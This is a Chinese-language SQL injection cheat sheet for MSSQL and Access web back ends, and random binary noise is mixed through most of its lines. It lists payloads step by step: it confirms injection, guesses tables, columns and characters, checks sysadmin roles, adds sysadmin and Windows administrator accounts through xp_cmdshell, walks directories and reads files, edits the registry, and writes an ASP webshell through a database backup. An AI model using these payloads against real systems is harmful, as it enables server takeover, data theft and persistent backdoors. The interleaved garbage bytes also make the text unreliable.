1.判断是否有注入;and 1=1 ;and 1=2 -:�,h8JyMP
2.初步判断是否是mssql ;and user>0 "��jHN#�}�
Y8PT`7gd`�
3.注入参数是字符'and [查询条件] and ''=' -db+Y:�xUZ
T�rr�h`@�R
4.搜索时没过滤参数的'and [查询条件] and '%25'=' gy{a+Wbc*
�<}�%ir,8�
5.判断数据库系统 +[ItkfSod!
nR7\� o(!�
;and (select count(*) from sysobjects)>0 mssql �e0L;V@R��
,:`�6x[ �+
;and (select count(*) from msysobjects)>0 access 9)">�(��)8
6fkr!&D�y7
�|$�P�LZ,�
��ng*%1;P
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ��$ZS9�CkN
&f*d�FUM]I
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 |�6>�_�L6t
a�M~fRra7
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 %���\l,X{X
CC\z_C*P-p
9.(1)猜字段的ascii值(access) kg�z{m��;R
G)&'8W F5o
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 qx)k�1�QY�
o(��P:f�)B
(2)猜字段的ascii值(mssql) RY{t�X�`��
=�FmU�]DV
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 x�/�=j�$oA
_
^{Ep/ME=
10.测试权限结构(mssql) �%'e(3;YI
r�HlF&� ET
Aq!�[���'G
�C~q�hww�h
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- {0� ��~0��
��v�gj^�-�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �lQ�BM0�|n
Gq*)]X{U�a
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- j;)g�+9`��
^%�&x�{F.
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ���0?SLRz8
Jdn*�?h�c+
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- d 4]%�Wdvf
g5Rm!T+@I<
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- s{e�(�- 7'
%z~U@��Mka
;and 1=(select IS_MEMBER('db_owner'));-- ^d8�0\P�Xz
:e�W~nI.Vc
�hli��10p$
!dY�:S'�;~
11.添加mssql和系统的帐户 bZ.N7X P�H
`fZD�%�o3l
;exec master.dbo.sp_addlogin username;-- |L;p�s���K
;exec master.dbo.sp_password null,username,password;-- xV#��a(>-4
��H��c]1mM
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �rf-�>mk�{
��f_z�tnRw
;exec master.dbo.xp_cmdshell 'net user username password #OW�s3$9�
A[�kH_{to;
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 1�>w^� q`P
= O1;vc}AA
;exec master.dbo.xp_cmdshell 'net user username password /add';-- %i�8>w:@NW
IY6_J�Ge_w
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- yvCR ��=�C
J�w�d&[�
O
T-C#��xmY(
to�qzS!&.v
12.(1)遍历目录 .dT;�T%3fO
xGf�D�z*t
;create table dirs(paths varchar(100), id int) �87�KrSZ��
c�^����O#O
;insert dirs exec master.dbo.xp_dirtree 'c:\' z,FTsR$��x
*O�>�a�q�u
;and (select top 1 paths from dirs)>0 Ug�lG�!1�L
A�&����c@8
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ]^�9*
t,{9
y?n��2`l7f
=`~Z@Ib�dI
]�"Y%M'���
(2)遍历目录 kQVD��C,d�
�~9�r!m5ws
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- QaW��Hz�
�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 $-P�qs�
^g
q�Q�O����D
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �_1<'"u#6w
�,|X�+/|gm
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 3g���[j%`k
�p*`SG�X�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �^Opy�6Bqb
neh;`7~5@K
H:-A; f!Z�
oNB�,.��:�
13.mssql中的存储过程 ?�[V�pN2*
8i;�)|��z7
xp_regenumvalues 注册表根键, 子键 yW^IN8f�m�
{R�-82�%�X
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 v��X�0��"S
yv)nW:�:D(
xp_regread 根键,子键,键值名 ^mueF��w}\
Hp����}�
;exec xp_regread PKR�� $I��
}�l(����m5
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 i9�eyrl+�!
�s�
S5fd)x
xp_regwrite 根键,子键, 值名, 值类型, 值 yd�ND$@; Z
�]}����[Yf
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �F`0��c�?)
Y/,$Y]%�g�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 b"M�`@';�+
eh:}X}c=J]
xp_regdeletevalue 根键,子键,值名 4r[pMJi��q
��-,��Q��$
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 b"�nG-0J�R
Y^6[[vaj2�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �h�yb� +#R
�xN3 [�Kp�
$iqi���:vY
�%g�u$_S�
14.mssql的backup创建webshell �)��p�<fL�
�A�B"1(PbG
use model 3`��k[!! �
��?,�:#8.9
create table cmd(str image); !ml�_S�)��
o�WD�S�K^�
insert into cmd(str) values (''); ��/*��AJ�r
nFe` <Al$N
backup database model to disk='c:\l.asp'; m0��j�|58~
=�1�*%>��K
W&e'�3gk�_
c�R�h\USS
15.mssql内置函数 C~{NKMeC/m
K2xH'v
O�(
;and (select @@version)>0 获得Windows的版本号 =0h|yj�nL/
0aC�2 Pym^
;and user_name()='dbo' 判断当前系统的连接用户是不是sa Wk�`�bb!P_
�6KEykw�
j
;and (select user_name())>0 爆当前系统的连接用户 lC=N�:=Mu�
b��+IO�h|
;and (select db_name())>0 得到当前连接的数据库 3zB|!p�C6s
7k[�pvd|�L
9����$o��<
EK?@Z.q+
16.简洁的webshell ;�h9�-}F��
%�9T~8L
@.
use model SbS$(Gt#Bv
u3Usq=I�j{
create table cmd(str image); -�J"qrp�Z^
QSH�Jmk 6L
insert into cmd(str) values (''); V)��0[`zJ�
'7Me�p�
]�
backup database model to disk='g:\wwwtest\l.asp';
